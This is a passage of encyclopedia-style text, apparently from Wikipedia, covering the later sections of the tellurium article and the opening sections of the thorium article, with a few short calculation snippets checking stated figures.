radioactive, with extremely long half-lives, including 2.2 × 10²⁴ years for 128Te. This is the longest known half-life among all radionuclides and is about 160 trillion (1.6 × 10¹⁴) times the age of the known universe. A further 31 artificial radioisotopes of tellurium are known, with atomic masses ranging from 104 to 142 and with half-lives of 19 days or less. Also, 17 nuclear isomers are known, with half-lives up to 154 days. 
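The comparison with the age of the universe is easy to verify. A quick arithmetic check, taking 13.8 billion years for the age of the universe (a standard value assumed here, not given in the text):

```python
# Sanity-check the claim that 128Te's half-life is ~160 trillion times
# the age of the universe. The half-life comes from the text; the age of
# the universe (13.8 billion years) is a standard assumed value.
half_life_te128 = 2.2e24   # years
age_universe = 1.38e10     # years

ratio = half_life_te128 / age_universe
print(f"ratio: {ratio:.2e}")   # ~1.6e14, i.e. about 160 trillion
```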
Except for beryllium-8 and beta-delayed alpha emission branches in some lighter nuclides, tellurium (104Te to 109Te) is the second lightest element with isotopes known to undergo alpha decay, antimony being the lightest. The atomic mass of tellurium (127.60) exceeds that of iodine (126.90), the next element in the periodic table. Occurrence With an abundance in the Earth's crust comparable to that of platinum (about 1 μg/kg), tellurium is one of the rarest stable solid elements. In comparison, even thulium – the rarest of the stable lanthanides – has a crustal abundance of 500 μg/kg (see Abundance of the chemical elements). The rarity of tellurium in the Earth's crust is not a reflection of its cosmic abundance. Tellurium is more abundant than rubidium in the cosmos, though rubidium is 10,000 times more abundant in the Earth's crust. The rarity of tellurium on Earth is thought to be caused by conditions during preaccretional sorting in the solar nebula, when the stable form of certain elements, in the absence of oxygen and water, was controlled by the reductive power of free hydrogen. Under this scenario, certain elements that form volatile hydrides, such as tellurium, were severely depleted through the evaporation of these hydrides. Tellurium and selenium are the heavy elements most depleted by this process. Tellurium is sometimes found in its native (i.e., elemental) form, but is more often found as the tellurides of gold such as calaverite and krennerite (two different polymorphs of AuTe2), petzite, Ag3AuTe2, and sylvanite, AgAuTe4. The town of Telluride, Colorado, was named in the hope of a strike of gold telluride (which never materialized, though metallic gold ore was found). Gold itself is usually found uncombined, but when found as a chemical compound, it is often combined with tellurium. Although tellurium is found with gold more often than in uncombined form, it is found even more often combined as tellurides of more common metals (e.g. melonite, NiTe2). Natural tellurite and tellurate minerals also occur, formed by the oxidation of tellurides near the Earth's surface. In contrast to selenium, tellurium does not usually replace sulfur in minerals because of the great difference in ionic radii. Thus, many common sulfide minerals contain substantial quantities of selenium and only traces of tellurium. In the gold rush of 1893, miners in Kalgoorlie discarded a pyritic material as they searched for pure gold, and it was used to fill in potholes and build sidewalks. In 1896, that tailing was discovered to be calaverite, a telluride of gold, and it sparked a second gold rush that included mining the streets. In 2023, astronomers detected the creation of tellurium in a collision between two neutron stars. History Tellurium (from the Latin tellus, meaning "earth") was discovered in the 18th century in a gold ore from the mines in Kleinschlatten (today Zlatna), near today's city of Alba Iulia, Romania. This ore was known as "Faczebajer weißes blättriges Golderz" (white leafy gold ore from Faczebaja, the German name of Facebánya, now Fața Băii in Alba County) or antimonalischer Goldkies (antimonic gold pyrite), and, according to Anton von Rupprecht, was Spießglaskönig (argent molybdique), containing native antimony. In 1782 Franz-Joseph Müller von Reichenstein, who was then serving as the Austrian chief inspector of mines in Transylvania, concluded that the ore did not contain antimony but was bismuth sulfide. 
The following year, he reported that this was erroneous and that the ore contained mostly gold and an unknown metal very similar to antimony. After a thorough investigation that lasted three years and included more than fifty tests, Müller determined the specific gravity of the mineral and noted that when heated, the new metal gives off a white smoke with a radish-like odor; that it imparts a red color to sulfuric acid; and that when this solution is diluted with water, it gives a black precipitate. Nevertheless, he was not able to identify this metal and gave it the names aurum paradoxum (paradoxical gold) and metallum problematicum (problem metal), because it did not exhibit the properties predicted for antimony. In 1789, a Hungarian scientist, Pál Kitaibel, discovered the element independently in an ore from Deutsch-Pilsen that had been regarded as argentiferous molybdenite, but later he gave the credit to Müller. In 1798, it was named by Martin Heinrich Klaproth, who had earlier isolated it from the mineral calaverite. In the early 1920s, Thomas Midgley Jr. found that tellurium prevented engine knocking when added to fuel, but ruled it out because of its difficult-to-eradicate smell. Midgley went on to discover and popularize the use of tetraethyl lead. The 1960s brought an increase in thermoelectric applications for tellurium (as bismuth telluride), and in free-machining steel alloys, which became the dominant use. These applications were overtaken by the growing importance of CdTe in thin-film solar cells in the 2000s. Production Most Te (and Se) is obtained from porphyry copper deposits, where it occurs in trace amounts. The element is recovered from anode sludges from the electrolytic refining of blister copper. It is also a component of dusts from blast-furnace refining of lead. Treatment of 1000 tons of copper ore yields approximately of tellurium. The anode sludges contain the selenides and tellurides of the noble metals in compounds with the formula M2Se or M2Te (M = Cu, Ag, Au). At temperatures of 500 °C the anode sludges are roasted with sodium carbonate under air. The metal ions are reduced to the metals, while the telluride is converted to sodium tellurite. Tellurites can be leached from the mixture with water and are normally present as hydrotellurites HTeO3− in solution. Selenites are also formed during this process, but they can be separated by adding sulfuric acid. The hydrotellurites are converted into insoluble tellurium dioxide while the selenites stay in solution. The metal is produced from the oxide either by electrolytic reduction or by reacting the tellurium dioxide with sulfur dioxide in sulfuric acid. Commercial-grade tellurium is usually marketed as 200-mesh powder but is also available as slabs, ingots, sticks, or lumps. The year-end price for tellurium in 2000 was US$30 per kilogram. In recent years, the tellurium price was driven up by increased demand and limited supply, reaching as high as US$220 per pound in 2006. The average annual price for 99.99%-pure tellurium increased from $38 per kilogram in 2017 to $74 per kilogram in 2018. Despite the expectation that improved production methods will double production, the United States Department of Energy (DoE) anticipates a supply shortfall of tellurium by 2025. In the 2020s, China produced ca. 50% of the world's tellurium and was the only country that mined Te as the main target rather than as a by-product. This dominance was driven by the rapid expansion of the solar cell industry in China. 
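The recovery chemistry described above can be summarized by two idealized equations. These are illustrative, textbook-style stoichiometries consistent with the process description (roasting a copper telluride anode sludge with sodium carbonate, then reducing the dioxide with sulfur dioxide); exact industrial practice varies:

```latex
% Idealized roasting of copper telluride in anode sludge with soda ash
% (illustrative stoichiometry, assumed rather than quoted from a source):
\mathrm{Cu_2Te + Na_2CO_3 + 2\,O_2 \longrightarrow 2\,CuO + Na_2TeO_3 + CO_2}
% Reduction of the dioxide by sulfur dioxide in aqueous sulfuric acid:
\mathrm{TeO_2 + 2\,SO_2 + 2\,H_2O \longrightarrow Te + 2\,H_2SO_4}
```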
In 2022, the largest Te providers by volume were China (340 tonnes), Russia (80 t), Japan (70 t), Canada (50 t), Uzbekistan (50 t), Sweden (40 t) and the United States (no official data). Compounds Tellurium belongs to the chalcogen (group 16) family of elements on the periodic table, which also includes oxygen, sulfur, selenium and polonium; tellurium and selenium compounds are similar. Tellurium exhibits the oxidation states −2, +2, +4 and +6, with +4 being most common. Tellurides Reduction of Te metal produces the tellurides and polytellurides, Ten2−. The −2 oxidation state is exhibited in binary compounds with many metals, such as zinc telluride, ZnTe, produced by heating tellurium with zinc. Decomposition of ZnTe with hydrochloric acid yields hydrogen telluride (H2Te), a highly unstable analogue of the other chalcogen hydrides H2O, H2S, and H2Se: ZnTe + 2 HCl → ZnCl2 + H2Te. Halides The +2 oxidation state is exhibited by the dihalides TeCl2, TeBr2, and TeI2. The dihalides have not been obtained in pure form, although they are known decomposition products of the tetrahalides in organic solvents, and the derived tetrahalotellurates(II), TeX4²⁻, are well-characterized, where X is Cl, Br, or I. These anions are square planar in geometry. Polynuclear anionic species also exist. With fluorine, Te also forms mixed-valence fluorides. In the +6 oxidation state, the –OTeF5 structural group occurs in a number of compounds. The square antiprismatic anion TeF8²⁻ is also attested. The other halogens do not form halides with tellurium in the +6 oxidation state, but only tetrahalides (TeCl4, TeBr4, and TeI4) in the +4 state, and other lower halides. In the +4 oxidation state, halotellurate anions are known, such as TeCl6²⁻. Halotellurium cations are also attested, including TeI3⁺, found in TeI3AsF6. Oxocompounds Tellurium monoxide was first reported in 1883 as a black amorphous solid formed by heat decomposition in vacuum, disproportionating into tellurium dioxide and elemental tellurium upon heating. Since then, however, its existence in the solid phase has been doubted and is in dispute, although it is known as a vapor fragment; the black solid may be merely an equimolar mixture of elemental tellurium and tellurium dioxide. Tellurium dioxide is formed by heating tellurium in air, where it burns with a blue flame. Tellurium trioxide, β-TeO3, is obtained by thermal decomposition of orthotelluric acid, Te(OH)6. The other two forms of trioxide reported in the literature, the α- and γ- forms, were found not to be true oxides of tellurium in the +6 oxidation state, but mixtures of other tellurium oxides. Tellurium also exhibits the mixed-valence oxides Te2O5 and Te4O9. The tellurium oxides and hydrated oxides form a series of acids, including tellurous acid (H2TeO3), orthotelluric acid (Te(OH)6) and metatelluric acid ((H2TeO4)n). The two forms of telluric acid form tellurate salts containing the TeO6⁶⁻ and TeO4²⁻ anions, respectively. Tellurous acid forms tellurite salts containing the anion TeO3²⁻. Zintl cations When tellurium is treated with concentrated sulfuric acid, the result is a red solution of the Zintl ion Te4²⁺. Oxidation of tellurium with other oxidants also gives the same square planar cation, in addition to the trigonal prismatic, yellow-orange Te6⁴⁺. Other tellurium Zintl cations include a polymeric species and the blue-black Te8²⁺, consisting of two fused five-membered tellurium rings. The latter cation is formed by the reaction of tellurium with tungsten hexachloride. Interchalcogen cations also exist, one of which has a distorted cubic geometry; these are formed by oxidizing mixtures of tellurium and selenium. 
Organotellurium compounds Tellurium does not readily form analogues of alcohols and thiols with the functional group –TeH; such compounds are called tellurols. The –TeH functional group is also denoted by the prefix tellanyl-. Like H2Te, these species are unstable with respect to loss of hydrogen. Telluraethers (R–Te–R) are more stable, as are telluroxides. Tritelluride quantum materials Recently, physicists and materials scientists have been discovering unusual quantum properties in layered compounds of tellurium combined with certain rare-earth elements, as well as yttrium (Y). These materials have the general formula RTe3, where R represents a rare-earth lanthanide (or Y), with the full family consisting of R = Y, lanthanum (La), cerium (Ce), praseodymium (Pr), neodymium (Nd), samarium (Sm), gadolinium (Gd), terbium (Tb), dysprosium (Dy), holmium (Ho), erbium (Er), and thulium (Tm). Compounds containing promethium (Pm), europium (Eu), ytterbium (Yb), and lutetium (Lu) have not yet been observed. These materials have a two-dimensional character within an orthorhombic crystal structure, with slabs of RTe separated by sheets of pure tellurium. It is thought that this 2-D layered structure is what leads to a number of interesting quantum features, such as charge-density waves, high carrier mobility, superconductivity under specific conditions, and other peculiar properties whose natures are only now emerging. For example, in 2022, a small group of physicists at Boston College in Massachusetts led an international team that used optical methods to demonstrate a novel axial mode of a Higgs-like particle in RTe3 compounds incorporating either of two rare-earth elements (R = La, Gd). This long-hypothesized, axial, Higgs-like particle also shows magnetic properties and may serve as a candidate for dark matter. Applications In 2022, the major applications of tellurium were thin-film solar cells (40%), thermoelectrics (30%), metallurgy (15%), and rubber (5%), with the first two applications growing rapidly owing to the worldwide effort to reduce dependence on fossil fuels. In metallurgy, tellurium is added to iron, stainless steel, copper, and lead alloys. It improves the machinability of copper without reducing its high electrical conductivity. It increases the resistance of lead to vibration and fatigue and stabilizes various carbides in malleable iron. Heterogeneous catalysis Tellurium oxides are components of commercial oxidation catalysts. Te-containing catalysts are used for the ammoxidation route to acrylonitrile (CH2=CH–C≡N): 2 CH2=CHCH3 + 2 NH3 + 3 O2 → 2 CH2=CHCN + 6 H2O. Related catalysts are used in the production of tetramethylene glycol. Niche Synthetic rubber vulcanized with tellurium shows mechanical and thermal properties that in some ways are superior to those of sulfur-vulcanized materials. Tellurium compounds are specialized pigments for ceramics. Selenides and tellurides greatly increase the optical refraction of glass, which is widely used in optical fibers for telecommunications. Mixtures of selenium and tellurium are used with barium peroxide as an oxidizer in the delay powder of electric blasting caps. Neutron bombardment of tellurium is the most common way to produce iodine-131. This in turn is used to treat some thyroid conditions, and as a tracer compound in hydraulic fracturing, among other applications. Semiconductor and electronic Cadmium telluride (CdTe) solar panels exhibit some of the greatest efficiencies among solar cell electric power generators. 
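One reason CdTe suits photovoltaics is its band gap. As a rough illustration, the longest wavelength such a cell can absorb follows from E = hc/λ; the band gap of about 1.5 eV used below is a commonly cited figure for CdTe, assumed here rather than taken from this article:

```python
# Longest absorbable wavelength for a semiconductor with a ~1.5 eV band gap
# (a commonly cited value for CdTe; treat it as an assumption, not a fact
# stated in this article). From E = h*c/lambda, lambda = h*c/E.
H = 6.626e-34        # Planck constant, J*s
C = 2.998e8          # speed of light, m/s
EV = 1.602e-19       # joules per electronvolt

band_gap_ev = 1.5
wavelength_nm = H * C / (band_gap_ev * EV) * 1e9
print(f"absorption edge: {wavelength_nm:.0f} nm")  # ~827 nm, near-infrared
```

With these numbers the absorption edge falls at roughly 827 nm, just beyond the visible range, so most of the solar spectrum can be harvested.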
In 2018, China installed thin-film solar panels with a total power output of 175 GW, more than any other country in the world; most of those panels were made of CdTe. In June 2022, China set goals for wind and solar power to supply 25% of energy consumption and to reach 1.2 billion kilowatts of installed capacity by 2030. This proposal will increase the demand for tellurium and its production worldwide, especially in China, where the annual volumes of Te refining increased from 280 tonnes in 2017 to 340 tonnes in 2022. Cadmium zinc telluride is an efficient material for detecting X-rays; it is used in the NASA space-based X-ray telescope NuSTAR. Mercury cadmium telluride is a semiconductor material that is used in thermal imaging devices. Organotellurium compounds Organotellurium compounds are mainly of interest in the research context. Several have been examined as precursors for metalorganic vapor phase epitaxy (MOVPE) growth of II-VI compound semiconductors. These precursor compounds include dimethyl telluride, diethyl telluride, diisopropyl telluride, diallyl telluride, and methyl allyl telluride. Diisopropyl telluride (DIPTe) is the preferred precursor for low-temperature growth of CdHgTe by MOVPE. The highest-purity metalorganics of both selenium and tellurium are used in these processes, and the compounds for the semiconductor industry are prepared by adduct purification. Tellurium suboxide is used in the media layer of rewritable optical discs, including ReWritable Compact Discs (CD-RW), ReWritable Digital Video Discs (DVD-RW), and ReWritable Blu-ray Discs. Tellurium is used in the phase-change memory chips developed by Intel. Bismuth telluride (Bi2Te3) and lead telluride are working elements of thermoelectric devices. Lead telluride shows promise in far-infrared detectors. Photocathodes Tellurium appears in a number of photocathodes used in solar-blind photomultiplier tubes and in high-brightness photoinjectors driving modern particle accelerators. The photocathode Cs-Te, which is predominantly Cs2Te, has a photoemission threshold of 3.5 eV and exhibits the uncommon combination of high quantum efficiency (>10%) and high durability in poor vacuum environments (lasting for months under use in RF electron guns). This has made it the go-to choice for photoemission electron guns used to drive free-electron lasers. In this application, it is usually driven at a wavelength of 267 nm, the third harmonic of commonly used Ti-sapphire lasers. Other Te-containing photocathodes have been grown using alkali metals such as rubidium, potassium, and sodium, but they have not attained the popularity that Cs-Te has enjoyed. Thermoelectric material Tellurium itself can be used as a high-performance elemental thermoelectric material. Trigonal Te, with the space group P3121, can transform into a topological insulator phase, which is favorable for thermoelectric applications. Though often not considered a thermoelectric material on its own, polycrystalline tellurium shows good thermoelectric performance, with a thermoelectric figure of merit, zT, as high as 1.0, higher than that of some conventional TE materials such as SiGe and BiSb. Tellurides, compound forms of tellurium, are more common TE materials. Typical and ongoing research includes materials such as Bi2Te3 and La3−xTe4. Bi2Te3 is widely used in applications from energy conversion to sensing and cooling because of its excellent TE properties. 
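The figure of merit mentioned above combines three transport properties in the standard formula zT = S²σT/κ. A minimal sketch of the calculation, using round placeholder values of the order often reported for bismuth telluride near room temperature (these particular numbers are assumptions for illustration, not data from this article):

```python
# Dimensionless thermoelectric figure of merit: zT = S^2 * sigma * T / kappa.
# The inputs below are round, order-of-magnitude placeholders typical of
# bismuth telluride near room temperature -- assumptions, not sourced data.
seebeck = 200e-6       # Seebeck coefficient S, V/K
conductivity = 1.0e5   # electrical conductivity sigma, S/m
kappa = 1.5            # thermal conductivity, W/(m*K)
temperature = 300.0    # absolute temperature, K

zt = seebeck**2 * conductivity * temperature / kappa
print(f"zT = {zt:.2f}")   # ~0.8 with these inputs
```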
Bi2Te3-based TE materials can achieve a conversion efficiency of 8%, with average zT values of 1.05 for p-type and 0.84 for n-type bismuth telluride alloys. Lanthanum telluride could potentially be used in thermoelectric generators for deep space, where large temperature differences are available. The zT value reaches a maximum of ~1.0 for a La3−xTe4 system with x near 0.2. This composition also allows other chemical substitutions, which may enhance the TE performance. The addition of Yb, for example, may increase the zT value from 1.0 to 1.2 at 1275 K, which is greater than that of the current SiGe power system. Biological role Tellurium has no known biological function, although fungi can incorporate it in place of sulfur and selenium into amino acids such as telluro-cysteine and telluro-methionine. Organisms have shown a highly variable tolerance to tellurium compounds. Many bacteria, such as Pseudomonas aeruginosa and Gayadomonas sp., take up tellurite and reduce it to elemental tellurium, which accumulates and causes a characteristic and often dramatic darkening of cells. In yeast, this reduction is mediated by the sulfate assimilation pathway. Tellurium accumulation seems to account for a major part of the toxicity effects. Many organisms also metabolize tellurium partly to form dimethyl telluride, although dimethyl ditelluride is also formed by some species. Dimethyl telluride has been observed in hot springs at very low concentrations. Tellurite agar is used to identify members of the genus Corynebacterium, most typically Corynebacterium diphtheriae, the pathogen responsible for diphtheria. Precautions Tellurium and tellurium compounds are considered to be mildly toxic and need to be handled with care, although acute poisoning is rare. Tellurium poisoning is particularly difficult to treat, as many chelation agents used in the treatment of metal poisoning increase the toxicity of tellurium. Tellurium is not reported to be carcinogenic, but it may be fatal if inhaled, swallowed, or absorbed through the skin. Humans exposed to as little as 0.01 mg/m3 in air exude a foul garlic-like odor known as "tellurium breath". This is caused by the body converting tellurium from any oxidation state to dimethyl telluride, (CH3)2Te, a volatile compound with a pungent garlic-like smell. Volunteers given 15 mg of tellurium still had this characteristic smell on their breath eight months later. In laboratories, this odor makes it possible to discern which scientists are responsible for tellurium chemistry, and even which books they have handled in the past. Even though the metabolic pathways of tellurium are not known, it is generally assumed that they resemble those of the more extensively studied selenium, because the final methylated metabolic products of the two elements are similar. People can be exposed to tellurium in the workplace by inhalation, ingestion, skin contact, and eye contact. The Occupational Safety and Health Administration (OSHA) has set the permissible exposure limit for tellurium in the workplace at 0.1 mg/m3 over an eight-hour workday. The National Institute for Occupational Safety and Health (NIOSH) has set a recommended exposure limit (REL) of 0.1 mg/m3 over an eight-hour workday. At concentrations of 25 mg/m3, tellurium is immediately dangerous to life and health.
Physical sciences
Chemical elements_2
null
30044
https://en.wikipedia.org/wiki/Thorium
Thorium
Thorium is a chemical element; it has symbol Th and atomic number 90. Thorium is a weakly radioactive light silver metal which tarnishes olive grey when it is exposed to air, forming thorium dioxide; it is moderately soft, malleable, and has a high melting point. Thorium is an electropositive actinide whose chemistry is dominated by the +4 oxidation state; it is quite reactive and can ignite in air when finely divided. All known thorium isotopes are unstable. The most stable isotope, 232Th, has a half-life of 14.05 billion years, or about the age of the universe; it decays very slowly via alpha decay, starting a decay chain named the thorium series that ends at stable 208Pb. On Earth, thorium and uranium are the only elements with no stable or nearly-stable isotopes that still occur naturally in large quantities as primordial elements. Thorium is estimated to be over three times as abundant as uranium in the Earth's crust, and is chiefly refined from monazite sands as a by-product of extracting rare-earth elements. Thorium was discovered in 1828 by the Norwegian amateur mineralogist Morten Thrane Esmark and identified by the Swedish chemist Jöns Jacob Berzelius, who named it after Thor, the Norse god of thunder. Its first applications were developed in the late 19th century. Thorium's radioactivity was widely acknowledged during the first decades of the 20th century. In the second half of the century, thorium was replaced in many uses due to concerns about its radioactivity. Thorium is still used as an alloying element in TIG welding electrodes but is slowly being replaced in the field with different compositions. It was also a material in high-end optics and scientific instrumentation, was used in some broadcast vacuum tubes, and served as the light source in gas mantles, but these uses have become marginal. It has been suggested as a replacement for uranium as nuclear fuel in nuclear reactors, and several thorium reactors have been built. Thorium is also used in strengthening magnesium, coating tungsten wire in electrical and welding equipment, controlling the grain size of tungsten in electric lamps, high-temperature crucibles, and glasses including camera and scientific instrument lenses. Other uses for thorium include heat-resistant ceramics, aircraft engines, and light bulbs. Ocean science has utilised 231Pa/230Th isotope ratios to understand the ancient ocean. Bulk properties Thorium is a moderately soft, paramagnetic, bright silvery radioactive actinide metal that can be bent or shaped. In the periodic table, it lies to the right of actinium, to the left of protactinium, and below cerium. Pure thorium is very ductile and, as is normal for metals, can be cold-rolled, swaged, and drawn. At room temperature, thorium metal has a face-centred cubic crystal structure; it has two other forms, one at high temperature (over 1360 °C; body-centred cubic) and one at high pressure (around 100 GPa; body-centred tetragonal). Thorium metal has a bulk modulus (a measure of resistance to compression of a material) of 54 GPa, about the same as tin's (58.2 GPa). Aluminium's is 75.2 GPa; copper's is 137.8 GPa; and mild steel's is 160–169 GPa. Thorium is about as hard as soft steel, so when heated it can be rolled into sheets and pulled into wire. Thorium is nearly half as dense as uranium and plutonium and is harder than both. It becomes superconductive below 1.4 K. Thorium's melting point of 1750 °C is above both that of actinium (1227 °C) and that of protactinium (1568 °C). 
At the start of period 7, from francium to thorium, the melting points of the elements increase (as in other periods), because the number of delocalised electrons each atom contributes increases from one in francium to four in thorium, leading to greater attraction between these electrons and the metal ions as their charge increases from one to four. After thorium, there is a new downward trend in melting points from thorium to plutonium, where the number of f electrons increases from about 0.4 to about 6: this trend is due to the increasing hybridisation of the 5f and 6d orbitals and the formation of directional bonds resulting in more complex crystal structures and weakened metallic bonding. (The f-electron count for thorium metal is a non-integer due to a 5f–6d overlap.) Among the actinides up to californium, which can be studied in at least milligram quantities, thorium has the highest melting and boiling points and the second-lowest density; only actinium is lighter. Thorium's boiling point of 4788 °C is the fifth-highest among all the elements with known boiling points. The properties of thorium vary widely depending on the degree of impurities in the sample. The major impurity is usually thorium dioxide (ThO2); even the purest thorium specimens usually contain about a tenth of a per cent of the dioxide. Experimental measurements of its density give values between 11.5 and 11.66 g/cm3: these are slightly lower than the theoretically expected value of 11.7 g/cm3 calculated from thorium's lattice parameters, perhaps due to microscopic voids forming in the metal when it is cast. These values lie between those of its neighbours actinium (10.1 g/cm3) and protactinium (15.4 g/cm3), part of a trend across the early actinides. Thorium can form alloys with many other metals. Addition of small proportions of thorium improves the mechanical strength of magnesium, and thorium–aluminium alloys have been considered as a way to store thorium in proposed future thorium nuclear reactors. Thorium forms eutectic mixtures with chromium and uranium, and it is completely miscible in both solid and liquid states with its lighter congener cerium. Isotopes There are seven naturally occurring isotopes of thorium, but none is stable. 232Th is one of the two nuclides beyond bismuth (the other being 238U) that have half-lives measured in billions of years; its half-life is 14.05 billion years, about three times the age of the Earth and slightly longer than the age of the universe. Four-fifths of the thorium present at Earth's formation has survived to the present. 232Th is the only isotope of thorium occurring in quantity in nature. Its stability is attributed to its closed nuclear subshell with 142 neutrons. Thorium has a characteristic terrestrial isotopic composition, with atomic weight 232.04. It is one of only four radioactive elements (along with bismuth, protactinium and uranium) that occur in large enough quantities on Earth for a standard atomic weight to be determined. Thorium nuclei are susceptible to alpha decay because the strong nuclear force cannot overcome the electromagnetic repulsion between their protons. The alpha decay of 232Th initiates the 4n decay chain, which includes isotopes with a mass number divisible by 4 (hence the name; it is also called the thorium series after its progenitor). This chain of consecutive alpha and beta decays begins with the decay of 232Th to 228Ra and terminates at 208Pb. 
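The four-fifths figure follows directly from exponential decay. A quick check using the 14.05-billion-year half-life given above, and taking the age of the Earth as 4.54 billion years (a standard value assumed here, not stated in the text):

```python
# Fraction of primordial 232Th surviving after t years: N/N0 = 2**(-t/T_half).
# The half-life comes from the text; the Earth's age (4.54 Gyr) is a standard
# assumed value.
T_HALF = 14.05e9    # half-life of 232Th, years
T_EARTH = 4.54e9    # age of the Earth, years

surviving = 0.5 ** (T_EARTH / T_HALF)
print(f"surviving fraction: {surviving:.2f}")  # ~0.80, i.e. four-fifths
```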
Any sample of thorium or its compounds contains traces of these daughters, which are isotopes of thallium, lead, bismuth, polonium, radon, radium, and actinium. Natural thorium samples can be chemically purified to extract useful daughter nuclides, such as 212Pb, which is used in nuclear medicine for cancer therapy. 227Th (an alpha emitter with an 18.68-day half-life) can also be used in cancer treatments such as targeted alpha therapies. 232Th also very occasionally undergoes spontaneous fission rather than alpha decay, and has left evidence of doing so in its minerals (as trapped xenon gas formed as a fission product), but the partial half-life of this process is very large, at over 10²¹ years, and alpha decay predominates. In total, 32 radioisotopes have been characterised, which range in mass number from 207 to 238. After 232Th, the most stable of them are 230Th (half-life 75,380 years), 229Th (7,917 years), 228Th (1.92 years), 234Th (24.10 days), and 227Th (18.68 days). All of these isotopes occur in nature as trace radioisotopes due to their presence in the decay chains of 232Th, 235U, 238U, and 237Np: the last of these is long extinct in nature due to its short half-life (2.14 million years), but is continually produced in minute traces from neutron capture in uranium ores. All of the remaining thorium isotopes have half-lives of less than thirty days, and the majority of these have half-lives of less than ten minutes. 233Th (half-life 22 minutes) occurs naturally as the result of neutron activation of natural 232Th. 226Th (half-life 31 minutes) has not yet been observed in nature, but would be produced by the still-unobserved double beta decay of natural 226Ra. In deep seawater the isotope 230Th makes up a significant fraction of natural thorium. This is because its parent 238U is soluble in water, but 230Th is insoluble and precipitates into the sediment. Uranium ores with low thorium concentrations can be purified to produce gram-sized thorium samples of which over a quarter is the 230Th isotope, since 230Th is one of the daughters of 238U. The International Union of Pure and Applied Chemistry (IUPAC) reclassified thorium as a binuclidic element in 2013; it had formerly been considered a mononuclidic element. Thorium has three known nuclear isomers (or metastable states), 216m1Th, 216m2Th, and 229mTh. 229mTh has the lowest known excitation energy of any isomer; it is so low that when it undergoes isomeric transition, the emitted gamma radiation is in the ultraviolet range. The nuclear transition from 229Th to 229mTh is being investigated for a nuclear clock. Different isotopes of thorium are chemically identical, but have slightly differing physical properties: for example, the densities of pure 228Th, 229Th, 230Th, and 232Th are expected to be 11.5, 11.6, 11.6, and 11.7 g/cm3 respectively. The isotope 229Th is expected to be fissionable with a bare critical mass of 2839 kg, although with steel reflectors this value could drop to 994 kg. 232Th is not fissionable, but it is fertile, as it can be converted to fissile 233U by neutron capture and subsequent beta decay. Radiometric dating Two radiometric dating methods involve thorium isotopes: uranium–thorium dating, based on the decay of 234U to 230Th, and ionium–thorium dating, which measures the ratio of 232Th to 230Th. These rely on the fact that 232Th is a primordial radioisotope, but 230Th only occurs as an intermediate decay product in the decay chain of 238U. 
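As a toy illustration of how the 230Th half-life quoted above underpins uranium–thorium dating, the age equation can be sketched under strong simplifying assumptions: no initial 230Th in the sample and 234U in secular equilibrium, so the 230Th/234U activity ratio grows as 1 − e^(−λt). The measured ratio in the example is invented for illustration; real measurements also correct for 234U/238U disequilibrium and detrital thorium:

```python
import math

# Toy uranium-thorium age estimate. Assumes zero initial 230Th and 234U in
# secular equilibrium, so activity(230Th)/activity(234U) = 1 - exp(-lam * t).
T_HALF_TH230 = 75_380.0              # years, half-life of 230Th (from the text)
lam = math.log(2) / T_HALF_TH230     # decay constant of 230Th, 1/years

measured_ratio = 0.5                 # hypothetical activity ratio for a sample
age = -math.log(1.0 - measured_ratio) / lam
print(f"apparent age: {age:,.0f} years")   # a ratio of 0.5 gives one half-life
```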
Uranium–thorium dating is a relatively short-range process because of the short half-lives of 234U and 230Th relative to the age of the Earth: it is also accompanied by a sister process involving the alpha decay of 235U into 231Th, which very quickly becomes the longer-lived 231Pa, and this process is often used to check the results of uranium–thorium dating. Uranium–thorium dating is commonly used to determine the age of calcium carbonate materials such as speleothems or coral, because uranium is more soluble in water than thorium and protactinium, which are selectively precipitated into ocean-floor sediments, where their ratios are measured. The scheme has a range of several hundred thousand years. Ionium–thorium dating is a related process, which exploits the insolubility of thorium (both 232Th and 230Th) and thus its presence in ocean sediments to date these sediments by measuring the ratio of 232Th to 230Th. Both of these dating methods assume that the proportion of 230Th to 232Th was constant during the period when the sediment layer was formed, that the sediment did not already contain thorium before contributions from the decay of uranium, and that the thorium cannot migrate within the sediment layer. Chemistry A thorium atom has 90 electrons, of which four are valence electrons. Four atomic orbitals are theoretically available for the valence electrons to occupy: 5f, 6d, 7s, and 7p. Despite thorium's position in the f-block of the periodic table, it has an anomalous [Rn]6d27s2 electron configuration in the ground state, as the 5f and 6d subshells in the early actinides are very close in energy, even more so than the 4f and 5d subshells of the lanthanides: thorium's 6d subshells are lower in energy than its 5f subshells, because its 5f subshells are not well-shielded by the filled 6s and 6p subshells and are destabilised. This is due to relativistic effects, which become stronger near the bottom of the periodic table, specifically the relativistic spin–orbit interaction. The closeness in energy of the 5f, 6d, and 7s levels of thorium results in thorium almost always losing all four valence electrons and occurring in its highest possible oxidation state of +4. This is different from its lanthanide congener cerium, in which +4 is also the highest possible state, but +3 plays an important role and is more stable. Thorium is much more similar to the transition metals zirconium and hafnium than to cerium in its ionization energies and redox potentials, and hence also in its chemistry: this transition-metal-like behaviour is the norm in the first half of the actinide series, from actinium to americium. Despite the anomalous electron configuration for gaseous thorium atoms, metallic thorium shows significant 5f involvement. A hypothetical metallic state of thorium that had the [Rn]6d27s2 configuration with the 5f orbitals above the Fermi level should be hexagonal close packed like the group 4 elements titanium, zirconium, and hafnium, and not face-centred cubic as it actually is. The actual crystal structure can only be explained when the 5f states are invoked, proving that thorium is metallurgically a true actinide. Tetravalent thorium compounds are usually colourless or yellow, like those of silver or lead, as the Th⁴⁺ ion has no 5f or 6d electrons. Thorium chemistry is therefore largely that of an electropositive metal forming a single diamagnetic ion with a stable noble-gas configuration, indicating a similarity between thorium and the main group elements of the s-block. 
Thorium and uranium are the most investigated of the radioactive elements because their radioactivity is low enough not to require special handling in the laboratory. Reactivity Thorium is a highly reactive and electropositive metal. With a standard reduction potential of −1.90 V for the Th⁴⁺/Th couple, it is somewhat more electropositive than zirconium or aluminium. Finely divided thorium metal can exhibit pyrophoricity, spontaneously igniting in air. When heated in air, thorium turnings ignite and burn with a brilliant white light to produce the dioxide. In bulk, the reaction of pure thorium with air is slow, although corrosion may occur after several months; most thorium samples are contaminated with varying degrees of the dioxide, which greatly accelerates corrosion. Such samples slowly tarnish, becoming grey and finally black at the surface. At standard temperature and pressure, thorium is slowly attacked by water, but does not readily dissolve in most common acids, with the exception of hydrochloric acid, where it dissolves leaving a black insoluble residue of ThO(OH,Cl)H. It dissolves in concentrated nitric acid containing a small quantity of catalytic fluoride or fluorosilicate ions; if these are not present, passivation by the nitrate can occur, as with uranium and plutonium. Inorganic compounds Most binary compounds of thorium with nonmetals may be prepared by heating the elements together. In air, thorium burns to form 